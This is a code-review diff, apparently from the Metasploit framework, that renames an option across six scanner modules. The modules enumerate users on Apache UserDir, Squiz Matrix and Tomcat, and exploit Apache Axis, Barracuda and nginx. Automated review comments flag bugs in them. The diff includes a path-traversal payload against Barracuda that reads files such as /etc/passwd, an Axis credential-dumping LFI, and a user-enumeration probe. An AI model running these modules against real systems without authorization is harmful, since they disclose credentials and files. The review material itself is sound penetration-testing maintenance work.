Land #6281, TARGETURI/full_uri fixes
commit
e56aa96a66
|
@ -36,7 +36,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
|
||||
register_options(
|
||||
[
|
||||
OptString.new('URI', [true, 'The path to users Home Page', '/']),
|
||||
OptString.new('TARGETURI', [true, 'The path to users Home Page', '/']),
|
||||
OptPath.new('USER_FILE', [ true, "File containing users, one per line",
|
||||
File.join(Msf::Config.data_directory, "wordlists", "unix_users.txt") ]),
|
||||
], self.class)
|
||||
|
@ -51,11 +51,6 @@ class Metasploit3 < Msf::Auxiliary
|
|||
)
|
||||
end
|
||||
|
||||
def target_url
|
||||
uri = normalize_uri(datastore['URI'])
|
||||
"http://#{vhost}:#{rport}#{uri}"
|
||||
end
|
||||
|
||||
def run_host(ip)
|
||||
@users_found = {}
|
||||
|
||||
|
@ -64,9 +59,9 @@ class Metasploit3 < Msf::Auxiliary
|
|||
}
|
||||
|
||||
if(@users_found.empty?)
|
||||
print_status("#{target_url} - No users found.")
|
||||
print_status("#{full_uri} - No users found.")
|
||||
else
|
||||
print_good("#{target_url} - Users found: #{@users_found.keys.sort.join(", ")}")
|
||||
print_good("#{full_uri} - Users found: #{@users_found.keys.sort.join(", ")}")
|
||||
report_note(
|
||||
:host => rhost,
|
||||
:port => rport,
|
||||
|
@ -80,8 +75,8 @@ class Metasploit3 < Msf::Auxiliary
|
|||
|
||||
def do_login(user)
|
||||
|
||||
vprint_status("#{target_url}~#{user} - Trying UserDir: '#{user}'")
|
||||
uri = normalize_uri(datastore['URI'])
|
||||
vprint_status("#{full_uri}~#{user} - Trying UserDir: '#{user}'")
|
||||
uri = normalize_uri(target_uri.path)
|
||||
payload = "#{uri}~#{user}/"
|
||||
begin
|
||||
res = send_request_cgi(
|
||||
|
@ -93,10 +88,10 @@ class Metasploit3 < Msf::Auxiliary
|
|||
|
||||
return unless res
|
||||
if ((res.code == 403) or (res.code == 200))
|
||||
print_good("#{target_url} - Apache UserDir: '#{user}' found ")
|
||||
print_good("#{full_uri} - Apache UserDir: '#{user}' found ")
|
||||
@users_found[user] = :reported
|
||||
else
|
||||
vprint_status("#{target_url} - Apache UserDir: '#{user}' not found ")
|
||||
vprint_status("#{full_uri} - Apache UserDir: '#{user}' not found ")
|
||||
end
|
||||
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
|
||||
rescue ::Timeout::Error, ::Errno::EPIPE
|
||||
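Review bot: Renaming the option from `URI` to `TARGETURI` in `register_options` leaves no trace of the old name, so a saved resource script that still sets `URI` would presumably be accepted without complaint while the module runs against the default path `/`. The same rename is made in the other five modules touched by this commit (Axis, Barracuda, nginx, Squiz Matrix, Tomcat). A one-line comment above the option would record it, for example `# Renamed from URI; scripts that set URI must be updated to TARGETURI`, and the commit description should mention the rename as well. The two `rescue` clauses at the end of `do_login` appear to have empty bodies, but the method continues outside the hunk, so that cannot be confirmed from here.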
|
|
|
@ -34,17 +34,12 @@ class Metasploit3 < Msf::Auxiliary
|
|||
|
||||
register_options([
|
||||
Opt::RPORT(8080),
|
||||
OptString.new('URI', [false, 'The path to the Axis listServices', '/axis2/services/listServices']),
|
||||
OptString.new('TARGETURI', [false, 'The path to the Axis listServices', '/axis2/services/listServices']),
|
||||
], self.class)
|
||||
end
|
||||
|
||||
def target_url
|
||||
uri = normalize_uri(datastore['URI'])
|
||||
"http://#{vhost}:#{rport}#{uri}"
|
||||
end
|
||||
|
||||
def run_host(ip)
|
||||
uri = normalize_uri(datastore['URI'])
|
||||
uri = normalize_uri(target_uri.path)
|
||||
|
||||
begin
|
||||
res = send_request_raw({
|
||||
|
@ -53,13 +48,12 @@ class Metasploit3 < Msf::Auxiliary
|
|||
}, 25)
|
||||
|
||||
if (res and res.code == 200)
|
||||
extract_uri = res.body.to_s.match(/\/axis2\/services\/([^\s]+)\?/)
|
||||
new_uri = "/axis2/services/#{$1}"
|
||||
new_uri = normalize_uri(new_uri)
|
||||
res.body.to_s.match(/\/axis2\/services\/([^\s]+)\?/)
|
||||
new_uri = normalize_uri("/axis2/services/#{$1}")
|
||||
get_credentials(new_uri)
|
||||
|
||||
else
|
||||
print_status("#{target_url} - Apache Axis - The remote page not accessible")
|
||||
print_status("#{full_uri} - Apache Axis - The remote page not accessible")
|
||||
return
|
||||
|
||||
end
|
||||
|
@ -106,10 +100,10 @@ class Metasploit3 < Msf::Auxiliary
|
|||
'uri' => "#{uri}" + lfi_payload,
|
||||
}, 25)
|
||||
|
||||
print_status("#{target_url} - Apache Axis - Dumping administrative credentials")
|
||||
print_status("#{full_uri} - Apache Axis - Dumping administrative credentials")
|
||||
|
||||
if res.nil?
|
||||
print_error("#{target_url} - Connection timed out")
|
||||
print_error("#{full_uri} - Connection timed out")
|
||||
return
|
||||
end
|
||||
|
||||
|
@ -121,17 +115,17 @@ class Metasploit3 < Msf::Auxiliary
|
|||
res.body.scan(/parameter\sname=\"password\">([^\s]+)</)
|
||||
password = $1
|
||||
|
||||
print_good("#{target_url} - Apache Axis - Credentials Found Username: '#{username}' - Password: '#{password}'")
|
||||
print_good("#{full_uri} - Apache Axis - Credentials Found Username: '#{username}' - Password: '#{password}'")
|
||||
|
||||
report_cred(ip: rhost, port: rport, user: username, password: password, proof: res.body)
|
||||
|
||||
else
|
||||
print_error("#{target_url} - Apache Axis - Not Vulnerable")
|
||||
print_error("#{full_uri} - Apache Axis - Not Vulnerable")
|
||||
return :abort
|
||||
end
|
||||
|
||||
else
|
||||
print_error("#{target_url} - Apache Axis - Unrecognized #{res.code} response")
|
||||
print_error("#{full_uri} - Apache Axis - Unrecognized #{res.code} response")
|
||||
return :abort
|
||||
|
||||
end
|
||||
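Review bot: The result of `res.body.to_s.match(...)` in the 200 branch of `run_host` is never checked, so when the listing contains no service link `$1` is nil and `get_credentials` is still called with the bare `/axis2/services/` path. Dropping the unused `extract_uri` variable was fine, but the match should gate the call: keep the MatchData with `m = res.body.to_s.match(%r{/axis2/services/([^\s]+)\?})`, return with a status message when `m` is nil, and build the path from `m[1]`. The `/axis2/services/` prefix is also hard-coded while the listing path now comes from `TARGETURI`, so the two can disagree once the operator changes the option. `run_host` continues outside the hunk.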
|
|
|
@ -38,21 +38,16 @@ class Metasploit3 < Msf::Auxiliary
|
|||
[
|
||||
Opt::RPORT(8000),
|
||||
OptString.new('FILE', [ true, "Define the remote file to view, ex:/etc/passwd", '/mail/snapshot/config.snapshot']),
|
||||
OptString.new('URI', [true, 'Barracuda vulnerable URI path', '/cgi-mod/view_help.cgi']),
|
||||
OptString.new('TARGETURI', [true, 'Barracuda vulnerable URI path', '/cgi-mod/view_help.cgi']),
|
||||
], self.class)
|
||||
end
|
||||
|
||||
def target_url
|
||||
uri = normalize_uri(datastore['URI'])
|
||||
"http://#{vhost}:#{rport}#{uri}"
|
||||
end
|
||||
|
||||
def run_host(ip)
|
||||
uri = normalize_uri(datastore['URI'])
|
||||
uri = normalize_uri(target_uri.path)
|
||||
file = datastore['FILE']
|
||||
payload = "?locale=/../../../../../../..#{file}%00"
|
||||
|
||||
print_status("#{target_url} - Barracuda - Checking if remote server is vulnerable")
|
||||
print_status("#{full_uri} - Barracuda - Checking if remote server is vulnerable")
|
||||
|
||||
res = send_request_raw(
|
||||
{
|
||||
|
@ -61,7 +56,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
}, 25)
|
||||
|
||||
if res.nil?
|
||||
print_error("#{target_url} - Connection timed out")
|
||||
print_error("#{full_uri} - Connection timed out")
|
||||
return
|
||||
end
|
||||
|
||||
|
@ -73,21 +68,21 @@ class Metasploit3 < Msf::Auxiliary
|
|||
if html.length > 100
|
||||
file_data = html.gsub(%r{</?[^>]+?>}, '')
|
||||
|
||||
print_good("#{target_url} - Barracuda - Vulnerable")
|
||||
print_good("#{target_url} - Barracuda - File Output:\n" + file_data + "\n")
|
||||
print_good("#{full_uri} - Barracuda - Vulnerable")
|
||||
print_good("#{full_uri} - Barracuda - File Output:\n" + file_data + "\n")
|
||||
else
|
||||
print_error("#{target_url} - Barracuda - Not vulnerable: HTML too short?")
|
||||
print_error("#{full_uri} - Barracuda - Not vulnerable: HTML too short?")
|
||||
end
|
||||
elsif res.body =~ /help_page/
|
||||
print_error("#{target_url} - Barracuda - Not vulnerable: Patched?")
|
||||
print_error("#{full_uri} - Barracuda - Not vulnerable: Patched?")
|
||||
else
|
||||
print_error("#{target_url} - Barracuda - File not found or permission denied")
|
||||
print_error("#{full_uri} - Barracuda - File not found or permission denied")
|
||||
end
|
||||
else
|
||||
print_error("#{target_url} - Barracuda - No HTML was returned")
|
||||
print_error("#{full_uri} - Barracuda - No HTML was returned")
|
||||
end
|
||||
else
|
||||
print_error("#{target_url} - Barracuda - Unrecognized #{res.code} response")
|
||||
print_error("#{full_uri} - Barracuda - Unrecognized #{res.code} response")
|
||||
end
|
||||
|
||||
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
|
||||
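Review bot: `file_data` in the `File Output` message is remote response content with only the HTML tags removed, and it goes to the operator's console unchanged; whether the print helpers filter control characters is not visible in this hunk. If they do not, a hostile or misbehaving server can place terminal escape sequences in the operator's session and in any captured log. Replacing non-printable bytes before printing would close that, e.g. `file_data = file_data.gsub(/[^[:print:]\s]/, '.')`. That line also mixes `+` concatenation with interpolation, where one interpolated string would match the rest of the file.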
|
|
|
@ -35,18 +35,13 @@ class Metasploit3 < Msf::Auxiliary
|
|||
|
||||
register_options(
|
||||
[
|
||||
OptString.new('URI', [true, 'Specify the path to download the file (ex: admin.php)', '/admin.php']),
|
||||
OptString.new('TARGETURI', [true, 'Specify the path to download the file (ex: admin.php)', '/admin.php']),
|
||||
OptString.new('PATH_SAVE', [true, 'The path to save the downloaded source code', '']),
|
||||
], self.class)
|
||||
end
|
||||
|
||||
def target_url
|
||||
uri = normalize_uri(datastore['URI'])
|
||||
"http://#{vhost}:#{rport}#{uri}"
|
||||
end
|
||||
|
||||
def run_host(ip)
|
||||
uri = normalize_uri(datastore['URI'])
|
||||
uri = normalize_uri(target_uri.path)
|
||||
path_save = datastore['PATH_SAVE']
|
||||
|
||||
vuln_versions = [
|
||||
|
@ -70,7 +65,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
}, 25)
|
||||
|
||||
if res.nil?
|
||||
print_error("#{target_url} - nginx - Connection timed out")
|
||||
print_error("#{full_uri} - nginx - Connection timed out")
|
||||
return
|
||||
else
|
||||
version = res.headers['Server']
|
||||
|
@ -78,17 +73,17 @@ class Metasploit3 < Msf::Auxiliary
|
|||
end
|
||||
|
||||
if vuln_versions.include?(version)
|
||||
print_good("#{target_url} - nginx - Vulnerable version: #{version}")
|
||||
print_good("#{full_uri} - nginx - Vulnerable version: #{version}")
|
||||
|
||||
if (res and res.code == 200)
|
||||
|
||||
print_good("#{target_url} - nginx - Getting the source of page #{uri}")
|
||||
print_good("#{full_uri} - nginx - Getting the source of page #{uri}")
|
||||
|
||||
save_source = File.new("#{path_save}#{uri}","w")
|
||||
save_source.puts(res.body.to_s)
|
||||
save_source.close
|
||||
|
||||
print_status("#{target_url} - nginx - File successfully saved: #{path_save}#{uri}") if (File.exists?("#{path_save}#{uri}"))
|
||||
print_status("#{full_uri} - nginx - File successfully saved: #{path_save}#{uri}") if (File.exists?("#{path_save}#{uri}"))
|
||||
|
||||
else
|
||||
print_error("http://#{vhost}:#{rport} - nginx - Unrecognized #{res.code} response")
|
||||
|
@ -98,9 +93,9 @@ class Metasploit3 < Msf::Auxiliary
|
|||
|
||||
else
|
||||
if version =~ /nginx/
|
||||
print_error("#{target_url} - nginx - Cannot exploit: the remote server is not vulnerable - Version #{version}")
|
||||
print_error("#{full_uri} - nginx - Cannot exploit: the remote server is not vulnerable - Version #{version}")
|
||||
else
|
||||
print_error("#{target_url} - nginx - Cannot exploit: the remote server is not ngnix")
|
||||
print_error("#{full_uri} - nginx - Cannot exploit: the remote server is not ngnix")
|
||||
end
|
||||
return
|
||||
|
||||
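Review bot: The `else` branch still prints `"http://#{vhost}:#{rport} - nginx - Unrecognized #{res.code} response"`, the one message in these hunks that the commit did not convert, so it keeps the hard-coded scheme and omits the path that every other message now takes from `full_uri`. It should read `print_error("#{full_uri} - nginx - Unrecognized #{res.code} response")`. In the save step, `File.new` without a block leaves the handle open if `puts` raises, and `File.exists?` is the deprecated spelling; `File.open("#{path_save}#{uri}", 'w') { |f| f.puts(res.body.to_s) }` together with `File.exist?` covers both. The last message also misspells the product as "ngnix".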
|
|
|
@ -40,17 +40,12 @@ class Metasploit3 < Msf::Auxiliary
|
|||
|
||||
register_options(
|
||||
[
|
||||
OptString.new('URI', [true, 'The path to users Squiz Matrix installation', '/']),
|
||||
OptString.new('TARGETURI', [true, 'The path to users Squiz Matrix installation', '/']),
|
||||
OptInt.new('ASSETBEGIN', [ true, "Asset ID to start at", 1]),
|
||||
OptInt.new('ASSETEND', [ true, "Asset ID to stop at", 100]),
|
||||
], self.class)
|
||||
end
|
||||
|
||||
def target_url
|
||||
uri = normalize_uri(datastore['URI'])
|
||||
"http://#{vhost}:#{rport}#{uri}"
|
||||
end
|
||||
|
||||
def run_host(ip)
|
||||
@users_found = {}
|
||||
|
||||
|
@ -65,9 +60,9 @@ class Metasploit3 < Msf::Auxiliary
|
|||
end
|
||||
|
||||
if(@users_found.empty?)
|
||||
print_status("#{target_url} - No users found.")
|
||||
print_status("#{full_uri} - No users found.")
|
||||
else
|
||||
print_good("#{target_url} - Users found: #{@users_found.keys.sort.join(", ")}")
|
||||
print_good("#{full_uri} - Users found: #{@users_found.keys.sort.join(", ")}")
|
||||
report_note(
|
||||
:host => rhost,
|
||||
:port => rport,
|
||||
|
@ -106,16 +101,18 @@ class Metasploit3 < Msf::Auxiliary
|
|||
|
||||
def do_enum(asset)
|
||||
begin
|
||||
uri = normalize_uri(target_uri.path)
|
||||
|
||||
res = send_request_cgi({
|
||||
'uri' => "#{target_url}?a=#{asset}",
|
||||
'uri' => "#{uri}?a=#{asset}",
|
||||
'method' => 'GET'
|
||||
}, 20)
|
||||
|
||||
if (datastore['VERBOSE'])
|
||||
if (res and res.code = 403 and res.body and res.body =~ /You do not have permission to access <i>(\w+)<\/i>/)
|
||||
print_status("#{target_url}?a=#{asset} - Trying Asset: '#{asset}' title '#{$1}'")
|
||||
print_status("#{full_uri}?a=#{asset} - Trying Asset: '#{asset}' title '#{$1}'")
|
||||
else
|
||||
print_status("#{target_url}?a=#{asset} - Trying Asset: '#{asset}'")
|
||||
print_status("#{full_uri}?a=#{asset} - Trying Asset: '#{asset}'")
|
||||
end
|
||||
end
|
||||
|
||||
|
@ -123,25 +120,25 @@ class Metasploit3 < Msf::Auxiliary
|
|||
user=$1.strip
|
||||
|
||||
# try the full name of the user
|
||||
tmpasset = asset -1
|
||||
tmpasset = asset - 1
|
||||
res = send_request_cgi({
|
||||
'uri' => "#{target_url}?a=#{tmpasset}",
|
||||
'uri' => "#{uri}?a=#{tmpasset}",
|
||||
'method' => 'GET'
|
||||
}, 20)
|
||||
if (res and res.code = 403 and res.body and res.body =~ /You do not have permission to access <i>Inbox<\/i>/)
|
||||
tmpasset = asset -2
|
||||
tmpasset = asset - 2
|
||||
res = send_request_cgi({
|
||||
'uri' => "#{target_url}?a=#{tmpasset}",
|
||||
'uri' => "#{uri}?a=#{tmpasset}",
|
||||
'method' => 'GET'
|
||||
}, 20)
|
||||
print_good("#{target_url}?a=#{asset} - Trying to obtain fullname for Asset ID '#{asset}', '#{user}'")
|
||||
print_good("#{full_uri}?a=#{asset} - Trying to obtain fullname for Asset ID '#{asset}', '#{user}'")
|
||||
if (res and res.code = 403 and res.body and res.body =~ /You do not have permission to access <i>(.*)<\/i>/)
|
||||
fullname = $1.strip
|
||||
print_good("#{target_url}?a=#{tmpasset} - Squiz Matrix User Found: '#{user}' (#{fullname})")
|
||||
print_good("#{full_uri}?a=#{tmpasset} - Squiz Matrix User Found: '#{user}' (#{fullname})")
|
||||
@users_found["#{user} (#{fullname})"] = :reported
|
||||
end
|
||||
else
|
||||
print_good("#{target_url} - Squiz Matrix User: '#{user}'")
|
||||
print_good("#{full_uri} - Squiz Matrix User: '#{user}'")
|
||||
@users_found[user] = :reported
|
||||
end
|
||||
|
||||
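Review bot: All three response checks in `do_enum` use `res.code = 403`, which is an assignment, so the status test is always truthy and the real status code is overwritten with 403; only the body regex decides the outcome. Each should be `res.code == 403` (the verbose check, the `Inbox` check and the full-name check). The commit edits the lines next to these conditions but leaves them as they were. Separately, wrapping `print_status` in `if (datastore['VERBOSE'])` duplicates what `vprint_status` already does in the other modules of this commit. `do_enum` continues outside the hunks.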
|
|
|
@ -41,7 +41,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
register_options(
|
||||
[
|
||||
Opt::RPORT(8080),
|
||||
OptString.new('URI', [true, 'The path of the Apache Tomcat Administration page', '/admin/j_security_check']),
|
||||
OptString.new('TARGETURI', [true, 'The path of the Apache Tomcat Administration page', '/admin/j_security_check']),
|
||||
OptPath.new('USER_FILE', [ true, "File containing users, one per line",
|
||||
File.join(Msf::Config.data_directory, "wordlists", "tomcat_mgr_default_users.txt") ]),
|
||||
], self.class)
|
||||
|
@ -49,16 +49,11 @@ class Metasploit3 < Msf::Auxiliary
|
|||
deregister_options('PASSWORD','PASS_FILE','USERPASS_FILE','USER_AS_PASS','STOP_ON_SUCCESS','BLANK_PASSWORDS','USERNAME')
|
||||
end
|
||||
|
||||
def target_url
|
||||
uri = normalize_uri(datastore['URI'])
|
||||
"http://#{vhost}:#{rport}#{uri}"
|
||||
end
|
||||
|
||||
def has_j_security_check?
|
||||
vprint_status("#{target_url} - Checking j_security_check...")
|
||||
res = send_request_raw({'uri' => normalize_uri(datastore['URI'])})
|
||||
vprint_status("#{full_uri} - Checking j_security_check...")
|
||||
res = send_request_raw({'uri' => normalize_uri(target_uri.path)})
|
||||
if res
|
||||
vprint_status("#{target_url} - Server returned: #{res.code.to_s}")
|
||||
vprint_status("#{full_uri} - Server returned: #{res.code.to_s}")
|
||||
return true if res.code == 200 or res.code == 302
|
||||
end
|
||||
|
||||
|
@ -67,7 +62,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
|
||||
def run_host(ip)
|
||||
unless has_j_security_check?
|
||||
print_error("#{target_url} - Unable to enumerate users with this URI")
|
||||
print_error("#{full_uri} - Unable to enumerate users with this URI")
|
||||
return
|
||||
end
|
||||
|
||||
|
@ -78,9 +73,9 @@ class Metasploit3 < Msf::Auxiliary
|
|||
}
|
||||
|
||||
if(@users_found.empty?)
|
||||
print_status("#{target_url} - No users found.")
|
||||
print_status("#{full_uri} - No users found.")
|
||||
else
|
||||
print_good("#{target_url} - Users found: #{@users_found.keys.sort.join(", ")}")
|
||||
print_good("#{full_uri} - Users found: #{@users_found.keys.sort.join(", ")}")
|
||||
report_note(
|
||||
:host => rhost,
|
||||
:port => rport,
|
||||
|
@ -92,34 +87,34 @@ class Metasploit3 < Msf::Auxiliary
|
|||
|
||||
def do_login(user)
|
||||
post_data = "j_username=#{user}&password=%"
|
||||
vprint_status("#{target_url} - Apache Tomcat - Trying name: '#{user}'")
|
||||
vprint_status("#{full_uri} - Apache Tomcat - Trying name: '#{user}'")
|
||||
begin
|
||||
res = send_request_cgi(
|
||||
{
|
||||
'method' => 'POST',
|
||||
'uri' => normalize_uri(datastore['URI']),
|
||||
'uri' => normalize_uri(target_uri.path),
|
||||
'data' => post_data,
|
||||
}, 20)
|
||||
|
||||
if res and res.code == 200 and !res.get_cookies.empty?
|
||||
vprint_error("#{target_url} - Apache Tomcat #{user} not found ")
|
||||
vprint_error("#{full_uri} - Apache Tomcat #{user} not found ")
|
||||
elsif res and res.code == 200 and res.body =~ /invalid username/i
|
||||
vprint_error("#{target_url} - Apache Tomcat #{user} not found ")
|
||||
vprint_error("#{full_uri} - Apache Tomcat #{user} not found ")
|
||||
elsif res and res.code == 500
|
||||
# Based on: http://archives.neohapsis.com/archives/bugtraq/2009-06/0047.html
|
||||
vprint_good("#{target_url} - Apache Tomcat #{user} found ")
|
||||
vprint_good("#{full_uri} - Apache Tomcat #{user} found ")
|
||||
@users_found[user] = :reported
|
||||
elsif res and res.body.empty? and res.headers['Location'] !~ /error\.jsp$/
|
||||
# Based on: http://archives.neohapsis.com/archives/bugtraq/2009-06/0047.html
|
||||
print_good("#{target_url} - Apache Tomcat #{user} found ")
|
||||
print_good("#{full_uri} - Apache Tomcat #{user} found ")
|
||||
@users_found[user] = :reported
|
||||
else
|
||||
print_error("#{target_url} - NOT VULNERABLE")
|
||||
print_error("#{full_uri} - NOT VULNERABLE")
|
||||
return :abort
|
||||
end
|
||||
|
||||
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Timeout::Error, ::Errno::EPIPE
|
||||
print_error("#{target_url} - UNREACHABLE")
|
||||
print_error("#{full_uri} - UNREACHABLE")
|
||||
return :abort
|
||||
end
|
||||
end
|
||||
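Review bot: A nil `res` in `do_login` (no answer within the 20 second timeout) fails every `res and ...` test and lands in the final `else`, which prints "NOT VULNERABLE" and aborts, so an unresponsive or filtered host is recorded as a negative finding. A guard directly after the request would separate the two cases, e.g. `return :abort unless res` preceded by its own "no response" message. In the last `elsif`, `res.headers['Location'] !~ /error\.jsp$/` is also true when the header is absent, so an empty body without any redirect counts as a found user. The two "found" branches are inconsistent as well: one reports with `vprint_good`, the other with `print_good`.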
|
|